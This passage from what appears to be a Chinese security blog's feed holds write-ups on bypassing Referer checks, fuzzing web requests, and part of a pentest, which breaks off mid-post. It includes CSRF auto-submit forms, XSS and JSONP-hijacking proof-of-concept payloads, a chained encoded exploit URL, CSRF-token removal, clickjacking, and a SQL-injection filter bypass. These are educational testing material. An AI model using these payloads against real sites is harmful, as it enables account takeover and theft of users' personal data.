&lt;p&gt;但是，在相对安全的情况下，都会有Referer(HTTP请求头)的限制。那么该如何去做绕过呢？&lt;/p&gt;

&lt;h1 id=&quot;正文&quot;&gt;正文&lt;/h1&gt;

&lt;h2 id=&quot;什么是referer&quot;&gt;什么是Referer？&lt;/h2&gt;

&lt;p&gt;Referer是请求头的一部分，假设A站上有B站的链接，在A站上点击B站的链接，请求头会带有Referer，而Referer的值为A站的链接；这也就是为什么上文所说的场景，遇见了Referer的限制就可能GG了。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x00.png&quot; alt=&quot;0&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;绕过之道&quot;&gt;绕过之道&lt;/h2&gt;

&lt;h3 id=&quot;常规绕过&quot;&gt;常规绕过&lt;/h3&gt;

&lt;p&gt;一个实际场景：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x01.png&quot; alt=&quot;referer&quot; /&gt;&lt;/p&gt;

&lt;p&gt;先来说说一些常规化的东西：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;子域名方式&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;使用子域名的方式进行绕过：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x02.png&quot; alt=&quot;subdomain&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;域名前增加&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;在域名前面增加随机的a-z和0-9也可以进绕过：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x03.png&quot; alt=&quot;rand&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;？号&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;将域名作为GET请求参数进行绕过：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x04.png&quot; alt=&quot;subdomain&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;打破常规&quot;&gt;打破常规&lt;/h3&gt;

&lt;h4 id=&quot;无referer&quot;&gt;无Referer&lt;/h4&gt;

&lt;p&gt;之前在做测试的时候，将Referer头删除也可以绕过，但是在真正的利用中能不能去实现呢？是可以的。&lt;/p&gt;

&lt;p&gt;在HTML标签中有这样一个标签&lt;code&gt;&amp;lt;meta&amp;gt;&lt;/code&gt;，而这个标签是表示无Referer，就是如下的代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;meta name=&quot;referrer&quot; content=&quot;never&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;我原来的PoC为：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;html&amp;gt;
  &amp;lt;body&amp;gt;
  &amp;lt;script&amp;gt;history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)&amp;lt;/script&amp;gt;
    &amp;lt;form action=&quot;http://127.0.0.1/test.php&quot;&amp;gt;
      &amp;lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&amp;gt;
    &amp;lt;/form&amp;gt;
    &amp;lt;script&amp;gt;
      document.forms[0].submit();
    &amp;lt;/script&amp;gt;
  &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;修改之后的PoC为：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;html&amp;gt;
  &amp;lt;meta name=&quot;referrer&quot; content=&quot;never&quot;&amp;gt;
  &amp;lt;body&amp;gt;
  &amp;lt;script&amp;gt;history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)&amp;lt;/script&amp;gt;
    &amp;lt;form action=&quot;http://127.0.0.1/test.php&quot;&amp;gt;
      &amp;lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&amp;gt;
    &amp;lt;/form&amp;gt;
    &amp;lt;script&amp;gt;
      document.forms[0].submit();
    &amp;lt;/script&amp;gt;
  &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x05.png&quot; alt=&quot;null referer&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;与其他资源组合&quot;&gt;与其他资源组合&lt;/h4&gt;

&lt;h5 id=&quot;超链接&quot;&gt;超链接&lt;/h5&gt;

&lt;p&gt;在上文就提到了A站有B站的链接，在A站点击B站的链接，Referer就为A站的链接了。那么在这里我能否使用白名单域下的业务做超链接，链接地址为A站存在问题的链接再搭配一个点击劫持或者诱导的方式进行组合攻击？&lt;/p&gt;

&lt;p&gt;&lt;em&gt;例如gh0st.cn做了Referer的限制：&lt;/em&gt;&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;Referer&lt;/th&gt;
      &lt;th&gt;State&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;http://gh0st.cn (Current Domain)&lt;/td&gt;
      &lt;td&gt;YES&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;http://www.hi-ourlife.cn (Other Domain)&lt;/td&gt;
      &lt;td&gt;NO&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;http://a.gh0st.cn (SubDomain)&lt;/td&gt;
      &lt;td&gt;YES&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;&lt;strong&gt;实际场景：&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;公开信息对外&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;在个人中心处可以编辑个人的微博地址：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x06.png&quot; alt=&quot;weibo&quot; /&gt;&lt;/p&gt;

&lt;p&gt;微博地址是对外的公开信息：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x07.png&quot; alt=&quot;weibo&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那么结合一下点击劫持或者用户常规的点击了～那就GGGGGGG了～&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;论坛&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;现在很多厂商都有自己的开放论坛，特别是Discuz这种很多，而Discuz回复是可以使用超链接的：&lt;/p&gt;

&lt;p&gt;回复这样的格式：&lt;code&gt;[url=u]t[/url]&lt;/code&gt; u部分为地址，t部分为地址名字～&lt;/p&gt;

&lt;h5 id=&quot;url跳转&quot;&gt;URL跳转&lt;/h5&gt;

&lt;p&gt;302跳转是否可以？NO，不可以。&lt;/p&gt;

&lt;p&gt;这里的URL跳转是JavaScript的URL跳转。&lt;/p&gt;

&lt;p&gt;常见的两个：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;window.location.href=&quot;url&quot;;
window.open(&quot;url&quot;);
&lt;/code&gt;&lt;/pre&gt;

&lt;h6 id=&quot;反射xssreferer限制&quot;&gt;反射XSS(Referer限制)&lt;/h6&gt;

&lt;ol&gt;
  &lt;li&gt;这里我已经有一个存在任意URL跳转漏洞了：&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;code&gt;http://test.vulkey.cn/link.php?url=http://www.hi-ourlife.com&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x08.png&quot; alt=&quot;js&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;我有一个反射XSS漏洞：&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;code&gt;http://vulkey.cn/jsonp.php?callback=vulkey&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;当 &lt;code&gt;referer = a.com&lt;/code&gt; :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x09.png&quot; alt=&quot;xss&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当 &lt;code&gt;referer = vulkey.cn&lt;/code&gt; :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x10.png&quot; alt=&quot;xss&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当 &lt;code&gt;referer = *.vulkey.cn&lt;/code&gt; :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x11.png&quot; alt=&quot;xss&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这个接口验证了Referer使用之前的方法没办法绕过，于是采用组合拳搭配。&lt;/p&gt;

&lt;p&gt;于是有了如下的构建：&lt;code&gt;http://test.vulkey.cn/link.php?url=http://vulkey.cn/jsonp.php?callback=vulkey&amp;lt;svg/onload=alert(1)&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x12.png&quot; alt=&quot;xss&quot; /&gt;&lt;/p&gt;

&lt;h6 id=&quot;jsonp劫持反射xssurl跳转&quot;&gt;JSONP劫持+反射XSS+URL跳转&lt;/h6&gt;

&lt;p&gt;这个案例是基于上面反射XSS案例的，现在已知的三个问题：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;JSONP接口 &lt;code&gt;http://vulkey.cn/jsonp.php?callback=vulkey&lt;/code&gt; &lt;strong&gt;有Referer限制&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;反射XSS &lt;code&gt;http://vulkey.cn/jsonp.php?callback=vulkey&amp;lt;svg/onload=alert(1)&amp;gt;&lt;/code&gt; &lt;strong&gt;有Referer限制&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;JavaScript URL跳转 &lt;code&gt;http://test.vulkey.cn/link.php?url=http://www.hi-ourlife.com&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;一般JSONP跨域劫持的PoC是这样的：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script&amp;gt;function jsonp2(data){alert(JSON.stringify(data));}&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;url&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但是因为有Referer限制，就不能在自己的站点上做PoC了，就只能利用反射XSS漏洞构建PoC：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://vulkey.cn/jsonp.php?callback=%3Cscript%3Efunction+vulkey(data){alert(JSON.stringify(data));}%3C/script%3E%3Cscript+src=%22http://vulkey.cn/jsonp.php?callback=vulkey%22%3E%3C/script%3E&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;但仅仅如此是不够是因为XSS有Referer来源的限制，所以最终的PoC应该是这样的：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://test.vulkey.cn/link.php?url=http://vulkey.cn/jsonp.php?callback=%253Cscript%253Efunction%2bvulkey%28data%29%7Balert%28JSON.stringify%28data%29%29%3B%7D%253C%2fscript%253E%253Cscript%2bsrc%3D%2522http%3A%2f%2fvulkey.cn%2fjsonp.php%3Fcallback%3Dvulkey%2522%253E%253C%2fscript%253E&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-01/0x13.png&quot; alt=&quot;bypass&quot; /&gt;&lt;/p&gt;

&lt;p&gt;也就是说在这里JS的URL跳转解决了XSS的Referer限制问题，而XSS又解决了JSONP接口的Referer限制问题，这是一个联合组合拳。如果你发现的XSS没有Referer限制则不需要这么”麻烦”。&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;文中总结一些小的TIPS，针对我遇到的实际案例进行了漏洞的复现截图，打开思维其实还有更多更好的思路，有机会后期会写出来。&lt;/p&gt;
</description>
          <pubDate>2018-08-01T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-08-01/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-08-01/1</guid>
        </item>
      
    
      
        <item>
          <title>我的Web应用安全模糊测试之路</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;坏蛋(春秋社区)跟我说要我准备议题的时候，我是懵逼的～仔细想了一下自己这么菜，能讲什么呢？&lt;/p&gt;

&lt;p&gt;思考了很久最终定了这个标题：《我的Web应用安全模糊测试之路》&lt;/p&gt;

&lt;p&gt;这篇议题主要围绕我做Web应用安全测试的时候所运用的一些技巧和思路。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/0.png&quot; alt=&quot;title&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;我的web应用安全模糊测试之路&quot;&gt;我的Web应用安全模糊测试之路&lt;/h1&gt;

&lt;h2 id=&quot;什么是web应用中的模糊测试&quot;&gt;什么是Web应用中的模糊测试？&lt;/h2&gt;

&lt;p&gt;Web应用是基于什么进行传输的？HTTP协议。&lt;/p&gt;

&lt;p&gt;模糊测试是什么？Payload随机。&lt;/p&gt;

&lt;p&gt;Payload放哪里？HTTP请求报文格式是什么？&lt;strong&gt;请求行(请求方式 URI HTTP/1.1)&lt;/strong&gt;、&lt;strong&gt;请求头&lt;/strong&gt;、&lt;strong&gt;请求报文主体(POST Data)&lt;/strong&gt;。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;模糊测试秘籍-&amp;gt;增(Add) &amp;amp;&amp;amp; 删(Del)&lt;/strong&gt;&lt;/p&gt;

&lt;h3 id=&quot;被固化的测试思维&quot;&gt;被固化的测试思维&lt;/h3&gt;

&lt;p&gt;我列出一个请求，边看边思考你会怎么测试这个请求呢？&lt;/p&gt;

&lt;p&gt;HTTP请求报文(Request)：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;GET /uc/getInfo HTTP/1.1
Host: gh0st.cn
Origin: http://gh0st.cn
...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;HTTP响应主体(Response Content):&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &quot;id&quot;: &quot;1024&quot;,
    &quot;realName&quot;: &quot;yudan&quot;,
    &quot;mobilePhone&quot;: &quot;13888888888&quot;,
    &quot;cardNo&quot;: &quot;111111111111111111&quot;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;看到这想必你已经知道自己要测试的内容是什么了，一般来讲很多人会先注意&lt;code&gt;Origin&lt;/code&gt;这个HTTP请求报文头，看响应的HTTP头：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;...
Access-Control-Allow-Origin: http://gh0st.cn
Access-Control-Allow-Crdentials: True
Access-Control-Allow-Methods: OPTION, POST, GET
...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;如果我修改Origin的值为&lt;code&gt;http://qianan.cn&lt;/code&gt;，返回的也是&lt;code&gt;Access-Control-Allow-Origin: http://qianan.cn&lt;/code&gt;，那就代表着这里存在CORS跨域资源共享(任意域)的问题，具体在这里就不多说了参考我之前的一篇文章：http://gh0st.cn/archives/2018-03-22/1&lt;/p&gt;

&lt;p&gt;这里也许会有什么匹配之类的验证，一般的两种绕过方法：&lt;/p&gt;

&lt;p&gt;1.子域名(&lt;code&gt;http://{domain}.mst.cn/ -&amp;gt; http://gh0st.cn.mst.cn/&lt;/code&gt;)&lt;/p&gt;

&lt;p&gt;2.域名前缀(&lt;code&gt;http://{a-z}{domain} -&amp;gt; http://agh0st.cn/&lt;/code&gt;)&lt;/p&gt;

&lt;p&gt;也许到这里部分人的测试已经Over了～那么我还会继续测试下去，如何测？往下看↓&lt;/p&gt;

&lt;h3 id=&quot;模糊测试之增&quot;&gt;模糊测试之增&lt;/h3&gt;

&lt;h4 id=&quot;增---入门&quot;&gt;增 - 入门&lt;/h4&gt;

&lt;p&gt;观察响应报文格式：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &quot;id&quot;: &quot;1024&quot;,
    &quot;realName&quot;: &quot;yudan&quot;,
    &quot;mobilePhone&quot;: &quot;13888888888&quot;,
    &quot;cardNo&quot;: &quot;111111111111111111&quot;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这里的格式为JSON格式，那么跟JSON有关的漏洞最先想到的是什么？&lt;/p&gt;

&lt;p&gt;没错，JSONP跨域劫持（想科普下？看这里-&amp;gt; http://gh0st.cn/archives/2018-03-22/1）。&lt;/p&gt;

&lt;p&gt;JSONP跨域劫持需要具备的条件是回调参数，而这里并没有，没有回调参数，那我就增加一个回调参数，如下是我的一份字典：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/1.png&quot; alt=&quot;1.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;使用BurpSuite的Intruder模块，进行枚举测试：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /uc/getInfo?callback=mstkey HTTP/1.1
GET /uc/getInfo?cb=mstkey HTTP/1.1
GET /uc/getInfo?jsonp=mstkey HTTP/1.1
...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;终于某一条请求得到了我想要的结果：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;mstkey({&quot;id&quot;:&quot;1024&quot;,&quot;realname&quot;:&quot;yudan&quot;,&quot;mobilePhone&quot;:&quot;13888888888&quot;,&quot;cardNo&quot;:&quot;111111111111111111&quot;})
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;那在这里我就可以构建PoC了：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script&amp;gt;function mstkey(data){alert(JSON.stringify(data));}&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;http://gh0st.cn/uc/getInfo?callback=mstkey&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;增---进阶&quot;&gt;增 - 进阶&lt;/h4&gt;

&lt;p&gt;除了上面所说的增加回调参数以外，还可以增加什么呢？&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/2.png&quot; alt=&quot;URL&quot; /&gt;&lt;/p&gt;

&lt;p&gt;增加的参数和值可以&lt;strong&gt;分析网站数据&lt;/strong&gt;、&lt;strong&gt;关联网站数据&lt;/strong&gt;、&lt;strong&gt;整合自用字典与网站字段结合&lt;/strong&gt;。&lt;/p&gt;

&lt;p&gt;响应报文转换：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &quot;id&quot;: &quot;1024&quot;,
    &quot;realName&quot;: &quot;yudan&quot;,
    &quot;mobilePhone&quot;: &quot;13888888888&quot;,
    &quot;cardNo&quot;: &quot;111111111111111111&quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;转换为HTTP请求参数 &lt;strong&gt;键=值&lt;/strong&gt; 格式：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;id=1024
realName=yudan
mobilePhone=13888888888
cardNo=111111111111111111
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;初次之外还有什么？当然是使用自用字典和如上总结的进行整合：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/3.png&quot; alt=&quot;add&quot; /&gt;&lt;/p&gt;

&lt;p&gt;注意一点，参数都整理好之后，对应的值采用B账号的对应值，因为这样才会有差异，才能进行分析是否存在相关的漏洞，一般加参数会存在&lt;strong&gt;越权&lt;/strong&gt;问题～&lt;/p&gt;

&lt;h4 id=&quot;增---深入&quot;&gt;增 - 深入&lt;/h4&gt;

&lt;p&gt;很多小伙伴挖漏洞的时候核心业务挖不动那肯定怼一些边缘业务和一些后台系统了，大多数人应该都遇见过这样的问题，找到了一个后台的地址点进去是管理界面，突然的有js跳转到登录界面去了，但是查看页面代码却能获取到很多的后台接口～&lt;/p&gt;

&lt;p&gt;很多人会选择登录爆破、未授权接口使用这些常规操作类型去测试，可能测完就会抛掉了，而我之前测试某项目的时候碰见的就是当我在接口后面加上admin=1的时候响应报文返回了这样的头：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;Set-Cookie: xxxxxx=xxxxxxx
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;给我设置了一个Cookie，我使用这个Cookie直接就进入了后台。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/4.png&quot; alt=&quot;hidden&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;模糊测试之删&quot;&gt;模糊测试之删&lt;/h3&gt;

&lt;p&gt;在这里有一处实际场景：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/5.png&quot; alt=&quot;mail&quot; /&gt;&lt;/p&gt;

&lt;p&gt;其流程是这样的：输入邮箱-&amp;gt;点击修改邮箱-&amp;gt;发送修改链接到该邮箱-&amp;gt;邮箱打开修改链接-&amp;gt;成功修改&lt;/p&gt;

&lt;p&gt;明显流程就有问题，按照常的流程来说应该先验证原邮箱(手机号)再做修改操作。&lt;/p&gt;

&lt;p&gt;点击修改邮箱按钮获取到的请求如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST /uc/changeEmail HTTP/1.1
Host: **
...

mail=admin%40gh0st.cn&amp;amp;token=md5(token)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这里有Token保护，用来防御CSRF的，这里将token置空或者&lt;strong&gt;删除 键=值&lt;/strong&gt; 即可绕过，这里是因为token并没有实际的去做校验，也就是”表面安全”。&lt;/p&gt;

&lt;h3 id=&quot;增的组合拳&quot;&gt;增的组合拳&lt;/h3&gt;

&lt;p&gt;在”删”这个环节里说到了删除CSRF的&lt;code&gt;token&lt;/code&gt;绕过的方法，但不久之后厂商进行了修复。。。&lt;/p&gt;

&lt;p&gt;它成功的让token校验了，这里无法再使用原来的方法了，但是在这里观察请求和响应：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST /uc/changeEmail HTTP/1.1
Host: **
...

mail=admin%40gh0st.cn&amp;amp;token=md5(token)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;响应主体：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/6.png&quot; alt=&quot;mail&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里输入一个错误的或者已经绑定过的会提示输入错误，然后回显请求报文中的POST Data参数mail的值～&lt;/p&gt;

&lt;p&gt;也就是说在这里也许会存在CSRF + POST XSS，但是因为Token问题没办法利用～我们该怎么办？&lt;/p&gt;

&lt;p&gt;这里思来想去，只能尝试设想后台的参数接收-&amp;gt;输出代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php
    echo $_REQUEST[&apos;mail&apos;];//注意这里使用的是$_REQUEST 默认情况下包含了 $_GET，$_POST 和 $_COOKIE 的数组。
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;如果是如上的接收输出，那么在这里，我修改链接为：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://gh0st.cn/uc/changeEmail?mail=admin@gh0st.cn&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;神奇的发现页面回显了admin@gh0st.cn到界面上了，但是并不会去走修改邮箱，也就是说这里还是需要POST请求才会走修改邮箱流程，这里我先有了反射XSS的想法，但是奈何过滤了…&lt;/p&gt;

&lt;p&gt;于是衍生了第二个思路搭配点击劫持～（科普一下？-&amp;gt;http://gh0st.cn/archives/2017-12-20/1）&lt;/p&gt;

&lt;p&gt;透明化修改邮箱界面，然后获取修改邮箱按钮位置，做一个一模一样的按钮放在修改邮箱按钮之上，诱导用户点击这个按钮实际上是点击了修改邮箱的按钮～&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-07-25/7.png&quot; alt=&quot;clickjacking&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;感谢有你，每一个你，都要活的精彩。&lt;/p&gt;

</description>
          <pubDate>2018-07-25T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-07-25/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-07-25/1</guid>
        </item>
      
    
      
        <item>
          <title>记一次对某企业的渗透测试实战</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;本文总结一下漫长的渗透测试过程，想尽了各种方法，终于找到了突破口。so没有绝对的安全，所谓的安全性其实都是相对的～&lt;/p&gt;

&lt;h1 id=&quot;信息踩点&quot;&gt;信息踩点&lt;/h1&gt;

&lt;p&gt;在这里其实没办法去做一些有价值的收集，只能踩点，踩坑。&lt;/p&gt;

&lt;h2 id=&quot;信息难点&quot;&gt;信息难点：&lt;/h2&gt;

&lt;h3 id=&quot;传输加密&quot;&gt;传输加密：&lt;/h3&gt;

&lt;p&gt;要做渗透的目标是一个APP，根据抓到的请求包发现这个APP是经过某产品加固过的，所以HTTP的POST请求正文部分(Data)是神奇的密文～&lt;/p&gt;

&lt;h4 id=&quot;分析难点&quot;&gt;分析难点&lt;/h4&gt;

&lt;p&gt;分析：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;信息踩点其实也是解决难点的过程，在这里我们尝试对APP进行逆向，发现并没有什么东西，因为被加固了。&lt;/li&gt;
  &lt;li&gt;对APP进行功能的整理，逐个功能点进行抓包分析：
    &lt;ul&gt;
      &lt;li&gt;请求正文(data)虽然是密文，但是请求的URI还是真正按照对应的功能去请求的（参考URI的命名和功能的相对应性）&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;建立设想a&quot;&gt;建立设想(A)：&lt;/h4&gt;

&lt;p&gt;在这里请教了师傅，说可能GET请求参数并没有经过加密，而后台很有可能是这样写的：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php
$mstsec = $_REQUEST[&apos;vulkey&apos;];//注意这里使用的是$_REQUEST 默认情况下包含了 $_GET，$_POST 和 $_COOKIE 的数组。
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;ul&gt;
  &lt;li&gt;一点即通，首先我可以去测试是否是真的这样的后端处理接收。&lt;/li&gt;
  &lt;li&gt;为了满足第一步的验证，我需要想办法找到一个GET请求的包并且有带有GET参数，这样我才能判断规则，不然就是大海捞针。&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;有价值的东西&quot;&gt;有价值的东西&lt;/h2&gt;

&lt;p&gt;其实对APP做渗透测试，大部分情况下还是对网站做渗透测试。&lt;/p&gt;

&lt;p&gt;所以在这里抓包获取到的HOST，直接对其进行了前期的常规信息刺探（端口、目录、指纹…）&lt;/p&gt;

&lt;p&gt;中间件：Tomcat&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x00.png&quot; alt=&quot;Tomcat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;目录开放：/fileUpload/&lt;/p&gt;

&lt;p&gt;端口开放：8001 1444&lt;/p&gt;

&lt;p&gt;APP三个功能点：个人用户、资金管理、生活栏目&lt;/p&gt;

&lt;h1 id=&quot;渗透开端&quot;&gt;渗透开端&lt;/h1&gt;

&lt;p&gt;一开始粗略的对整个APP进行抓包，然后做一些简单的测试，发现并没有那种明面上的漏洞（SQL注入、XSS等等…），但是获取了这几条URI：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;/userCenter/getUser &lt;strong&gt;[获取用户信息URI POST]&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;/userCenter/pay/getSign?userSign= &lt;strong&gt;[获取Sign POST]&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;/userCenter/life/showShop?pId= &lt;strong&gt;[获取商品信息 GET]&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;/userCenter/showQRcode &lt;strong&gt;[获取二维码图片 POST]&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;不小心日偏&quot;&gt;不小心日偏&lt;/h2&gt;

&lt;p&gt;仔细的对每个功能点进行测试的时候，抓到了一些”逃出加固命运”的明文报文。&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;发现了S2-005这个历史悠久的Struts2框架远程代码执行问题：&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;执行了&lt;code&gt;whoami&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x01.png&quot; alt=&quot;S2-005&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;发现了SQL注入，这里需要做一些简单的绕过(e.g. &lt;code&gt;AandND 1 like 1&lt;/code&gt;)：&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x02.png&quot; alt=&quot;SQLi&quot; /&gt;&lt;/p&gt;

&lt;p&gt;然而没看清楚，一下次给日错地方了…很尴尬。&lt;/p&gt;

&lt;h2 id=&quot;关联分析&quot;&gt;关联分析&lt;/h2&gt;

&lt;p&gt;日偏后我分析了一下两者的特征，发现应该出自同一个程序员之手，并且这个程序员很喜欢使用驼峰命名法…&lt;/p&gt;

